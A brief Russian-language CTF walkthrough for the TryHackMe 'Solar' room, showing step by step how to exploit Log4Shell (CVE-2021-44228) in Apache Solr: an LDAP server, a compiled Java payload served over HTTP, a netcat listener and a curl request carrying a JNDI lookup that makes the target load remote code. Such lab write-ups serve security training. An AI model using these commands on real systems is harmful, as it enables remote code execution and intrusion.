💻 -h3x0v3rl0rd-
эксплуатация log4j CVE-2021-44228 ( TryHackMe Solar, прохождение)
git clone https://github.com/n3rdh4x0r/log4j.git
1. Запустите log4j.py (это установит все необходимые приложения и запустит LDAP-сервер)
ifconfig tun0
python3 log4j.py 10.8.227.251

2. Добавьте IP-адрес атакующего в файл Exploit.java

3. Скомпилируйте полезную нагрузку
javac Exploit.java -source 8 -target 8

4. Временный HTTP-сервер
python3 -m http.server 8888

5. Слушатель netcat

6. Наконец, всё, что осталось сделать, — это запустить эксплойт и отправить наш JNDI-синтаксис! Обратите внимание на изменения номера порта (теперь он указывает на наш LDAP-сервер) и на ресурс, который мы запрашиваем, указывая наш эксплойт:
curl 'http://10.10.45.175:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.227.251:1389/Exploit\}'

